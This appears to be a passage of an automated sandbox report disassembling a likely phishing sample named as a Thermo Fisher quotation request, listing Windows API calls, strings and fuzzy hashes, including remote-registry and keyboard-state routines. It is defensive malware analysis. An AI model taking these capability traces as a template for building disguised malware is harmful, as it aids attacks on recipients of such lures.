                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: d5beeffc5586a67507402c595d460c99ce013c4665f3a9a0b71dda6c46b50305
                                                              • Instruction ID: e33433bd950ea51d4be20ee22bbdff1bfbce8ee5dbf2b6722ab5da56e0e67dd6
                                                              • Opcode Fuzzy Hash: d5beeffc5586a67507402c595d460c99ce013c4665f3a9a0b71dda6c46b50305
                                                              • Instruction Fuzzy Hash: CF818F715043019FEB64DF24C8559ABB3EABF88305F18882EFC85C7351E730E9598B92
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0066EF3B
                                                              • GetFocus.USER32 ref: 0066EF4B
                                                              • GetDlgCtrlID.USER32(00000000), ref: 0066EF56
                                                              • _memset.LIBCMT ref: 0066F081
                                                              • GetMenuItemInfoW.USER32 ref: 0066F0AC
                                                              • GetMenuItemCount.USER32(00000000), ref: 0066F0CC
                                                              • GetMenuItemID.USER32(?,00000000), ref: 0066F0DF
                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0066F113
                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0066F15B
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0066F193
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0066F1C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: 9d8efcd6f2e6b69515e5d9bd3a96fac3bfe82f76b501dcb95d7804ee65e278e6
                                                              • Instruction ID: 8944922dbd8dd478d4ec2fd3944a5c20f7ed570b1427416bcacaaff72980820e
                                                              • Opcode Fuzzy Hash: 9d8efcd6f2e6b69515e5d9bd3a96fac3bfe82f76b501dcb95d7804ee65e278e6
                                                              • Instruction Fuzzy Hash: DB81AD75104301EFD710CF15D884AABBBEAFB89354F10492EF99497391D731D945CBA2
                                                              APIs
                                                                • Part of subcall function 0063ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0063ABD7
                                                                • Part of subcall function 0063ABBB: GetLastError.KERNEL32(?,0063A69F,?,?,?), ref: 0063ABE1
                                                                • Part of subcall function 0063ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0063A69F,?,?,?), ref: 0063ABF0
                                                                • Part of subcall function 0063ABBB: HeapAlloc.KERNEL32(00000000,?,0063A69F,?,?,?), ref: 0063ABF7
                                                                • Part of subcall function 0063ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0063AC0E
                                                                • Part of subcall function 0063AC56: GetProcessHeap.KERNEL32(00000008,0063A6B5,00000000,00000000,?,0063A6B5,?), ref: 0063AC62
                                                                • Part of subcall function 0063AC56: HeapAlloc.KERNEL32(00000000,?,0063A6B5,?), ref: 0063AC69
                                                                • Part of subcall function 0063AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0063A6B5,?), ref: 0063AC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0063A8CB
                                                              • _memset.LIBCMT ref: 0063A8E0
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0063A8FF
                                                              • GetLengthSid.ADVAPI32(?), ref: 0063A910
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0063A94D
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0063A969
                                                              • GetLengthSid.ADVAPI32(?), ref: 0063A986
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0063A995
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0063A99C
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0063A9BD
                                                              • CopySid.ADVAPI32(00000000), ref: 0063A9C4
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0063A9F5
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0063AA1B
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0063AA2F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: 4f88d2020c1a14e8360758f712930993b26bcde0aa853aa6525824faf7fe0b38
                                                              • Instruction ID: 1166fa74ca8919d7e3f8192f260dfe3dcdc02ab61b648cd2f65749fb57a79691
                                                              • Opcode Fuzzy Hash: 4f88d2020c1a14e8360758f712930993b26bcde0aa853aa6525824faf7fe0b38
                                                              • Instruction Fuzzy Hash: 31512A71900209BFDF10DF94DD85EEEBBBAFF04300F148219E995AA290DB359A05DBA1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-2391861430
                                                              • Opcode ID: 8539fdaa33a2b571c7f3e15cad6e54e8f509fb532ea55ff04ec1f11c6ca3d544
                                                              • Instruction ID: d64bc03618c80f6720257c7117dc845b2e4a6f6f377e9983b3e9e44499815082
                                                              • Opcode Fuzzy Hash: 8539fdaa33a2b571c7f3e15cad6e54e8f509fb532ea55ff04ec1f11c6ca3d544
                                                              • Instruction Fuzzy Hash: 6851BB71940119BACB58EBE0CD42EEFB77AAF09310F100169F401722A2EB706F59DFA5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-3420473620
                                                              • Opcode ID: e0097568863ff6e50fab6d6384185d60e3b8a34d0c0ff00f5195feed75564580
                                                              • Instruction ID: 4ef1f18298d9058f4da0454d4b62bb7414640564d7fe9135a9194d0e13dcef6b
                                                              • Opcode Fuzzy Hash: e0097568863ff6e50fab6d6384185d60e3b8a34d0c0ff00f5195feed75564580
                                                              • Instruction Fuzzy Hash: 6251BE71940119BACB58EBE0DD42EEFB77AAF05300F100169F506722A2EB706F59CFA5
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00662BB5,?,?), ref: 00663C1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: $Ek$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-373266013
                                                              • Opcode ID: 2803114618d44353a71d851da4bb991a9c643b2d15f89b0483f3c7bfbd5c0dd0
                                                              • Instruction ID: aee6f4a84feae9b21f9cf0fc94079a9cc31c1ef5e72093d95d8fe597808eb851
                                                              • Opcode Fuzzy Hash: 2803114618d44353a71d851da4bb991a9c643b2d15f89b0483f3c7bfbd5c0dd0
                                                              • Instruction Fuzzy Hash: 13413A7111025B8BDF54EF20D891AEB3767EF22340F145818EC651B392EB71EE8ACB64
                                                              APIs
                                                              • _memset.LIBCMT ref: 006455D7
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00645664
                                                              • GetMenuItemCount.USER32(006C1708), ref: 006456ED
                                                              • DeleteMenu.USER32(006C1708,00000005,00000000,000000F5,?,?), ref: 0064577D
                                                              • DeleteMenu.USER32(006C1708,00000004,00000000), ref: 00645785
                                                              • DeleteMenu.USER32(006C1708,00000006,00000000), ref: 0064578D
                                                              • DeleteMenu.USER32(006C1708,00000003,00000000), ref: 00645795
                                                              • GetMenuItemCount.USER32(006C1708), ref: 0064579D
                                                              • SetMenuItemInfoW.USER32(006C1708,00000004,00000000,00000030), ref: 006457D3
                                                              • GetCursorPos.USER32(?), ref: 006457DD
                                                              • SetForegroundWindow.USER32(00000000), ref: 006457E6
                                                              • TrackPopupMenuEx.USER32(006C1708,00000000,?,00000000,00000000,00000000), ref: 006457F9
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00645805
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: ae2ac73aa6b4d42d540cb5590ab9fcc29ecb641e8df379a3f13addb61fc90df5
                                                              • Instruction ID: 63fe603d80c4c2cb26b8128d8aaae588e74a17fe86aac6e502a78c392cdc8887
                                                              • Opcode Fuzzy Hash: ae2ac73aa6b4d42d540cb5590ab9fcc29ecb641e8df379a3f13addb61fc90df5
                                                              • Instruction Fuzzy Hash: 16710570640615BFEB209B14CC49FEABF67FF01368F240216F6166A2E2CB715C50DBA5
                                                              APIs
                                                              • _memset.LIBCMT ref: 0063A1DC
                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0063A211
                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0063A22D
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0063A249
                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0063A273
                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0063A29B
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0063A2A6
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0063A2AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                              • API String ID: 1687751970-22481851
                                                              • Opcode ID: d53abf6083992b0c01d31b56c4ec1d0496249f6c7bfb0cadb68214458b3332a9
                                                              • Instruction ID: f36f47cf9d82e65734790623a64df825c4bc68082ff26bfffde2b3edb954f92b
                                                              • Opcode Fuzzy Hash: d53abf6083992b0c01d31b56c4ec1d0496249f6c7bfb0cadb68214458b3332a9
                                                              • Instruction Fuzzy Hash: AE410975C50229ABDB15EBA4DC95DEEB7BABF04300F004169F801A31A0DB709E05DBA0
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 006467FD
                                                              • __swprintf.LIBCMT ref: 0064680A
                                                                • Part of subcall function 0062172B: __woutput_l.LIBCMT ref: 00621784
                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00646834
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00646840
                                                              • LockResource.KERNEL32(00000000), ref: 0064684D
                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0064686D
                                                              • LoadResource.KERNEL32(?,00000000), ref: 0064687F
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0064688E
                                                              • LockResource.KERNEL32(?), ref: 0064689A
                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006468F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                              • String ID: 5k
                                                              • API String ID: 1433390588-2623598330
                                                              • Opcode ID: 04ee6796bcc72118c245fcc66a4a7750c51ce97149419793e60d86f22b215f85
                                                              • Instruction ID: 0d1a8164125a422899d035e739622dea51040c55584aff357b8a8f9fa509dee4
                                                              • Opcode Fuzzy Hash: 04ee6796bcc72118c245fcc66a4a7750c51ce97149419793e60d86f22b215f85
                                                              • Instruction Fuzzy Hash: 0031AE71A0021AAFDB109F60ED54EFABBAAEF0A340B008525F902E6240E730DA11DB75
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006736F4,00000010,?,Bad directive syntax error,0069DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006425D6
                                                              • LoadStringW.USER32(00000000,?,006736F4,00000010), ref: 006425DD
                                                              • _wprintf.LIBCMT ref: 00642610
                                                              • __swprintf.LIBCMT ref: 00642632
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006426A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1080873982-4153970271
                                                              • Opcode ID: 51afd2bcec3d34749f21301c0789ceb5143963897b606690c82bbf0e46db039f
                                                              • Instruction ID: 78c30f9f44d435cb72a0abe701a49f6d094b991077036da7201ae5b5be636078
                                                              • Opcode Fuzzy Hash: 51afd2bcec3d34749f21301c0789ceb5143963897b606690c82bbf0e46db039f
                                                              • Instruction Fuzzy Hash: 2B217C7194022ABFCF15AB90CC1AEEF7B7ABF18304F000459F505661E2EA71AA58DF65
                                                              APIs
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00647B42
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00647B58
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00647B69
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00647B7B
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00647B8C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: SendString
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 890592661-1007645807
                                                              • Opcode ID: 484236d9f0f6922e669070eba519889613d495ef2b6a165ae1081691eb01237d
                                                              • Instruction ID: 1d319f872f744beee3a39497c431c39cd6706967a8a93741d9c4c219aea20856
                                                              • Opcode Fuzzy Hash: 484236d9f0f6922e669070eba519889613d495ef2b6a165ae1081691eb01237d
                                                              • Instruction Fuzzy Hash: 3011C4F068026979D724B761CC4ADFF7B7EEB91B10F01052DB411A61C1EFA01A89CAB4
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00647794
                                                                • Part of subcall function 0061DC38: timeGetTime.WINMM(?,75A8B400,006758AB), ref: 0061DC3C
                                                              • Sleep.KERNEL32(0000000A), ref: 006477C0
                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 006477E4
                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00647806
                                                              • SetActiveWindow.USER32 ref: 00647825
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00647833
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00647852
                                                              • Sleep.KERNEL32(000000FA), ref: 0064785D
                                                              • IsWindow.USER32 ref: 00647869
                                                              • EndDialog.USER32(00000000), ref: 0064787A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: 73a9ae757f282c0d3423424da5bb219f4a6f93512e537474afd281366971be94
                                                              • Instruction ID: 4688c9f64e7cf81f0ee88e1efa4a5455d2f5cd15b4f3c5e8899ae53d772533f3
                                                              • Opcode Fuzzy Hash: 73a9ae757f282c0d3423424da5bb219f4a6f93512e537474afd281366971be94
                                                              • Instruction Fuzzy Hash: FE216FB0204299BFE7005B20EC8DEB63F2BFB44348F00A529F50A823A2DB759D44DB75
                                                              APIs
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • CoInitialize.OLE32(00000000), ref: 0065034B
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006503DE
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 006503F2
                                                              • CoCreateInstance.OLE32(0068DA8C,00000000,00000001,006B3CF8,?), ref: 0065043E
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006504AD
                                                              • CoTaskMemFree.OLE32(?,?), ref: 00650505
                                                              • _memset.LIBCMT ref: 00650542
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0065057E
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006505A1
                                                              • CoTaskMemFree.OLE32(00000000), ref: 006505A8
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006505DF
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 006505E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 385d1042ece373bdd0a13557fc606249ba6b9afc648f8ef280db02b73d72ba34
                                                              • Instruction ID: 47995c1ad4594c5a3486af124ef51b0a14f804782a4e7d4158545507128fb354
                                                              • Opcode Fuzzy Hash: 385d1042ece373bdd0a13557fc606249ba6b9afc648f8ef280db02b73d72ba34
                                                              • Instruction Fuzzy Hash: F7B10875A00109AFDB04DFA4C888DAEBBBAFF48311F0485A9E905EB251DB30EE45CB54
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00642ED6
                                                              • SetKeyboardState.USER32(?), ref: 00642F41
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00642F61
                                                              • GetKeyState.USER32(000000A0), ref: 00642F78
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00642FA7
                                                              • GetKeyState.USER32(000000A1), ref: 00642FB8
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00642FE4
                                                              • GetKeyState.USER32(00000011), ref: 00642FF2
                                                              • GetAsyncKeyState.USER32(00000012), ref: 0064301B
                                                              • GetKeyState.USER32(00000012), ref: 00643029
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00643052
                                                              • GetKeyState.USER32(0000005B), ref: 00643060
                                                              Memory Dump Source
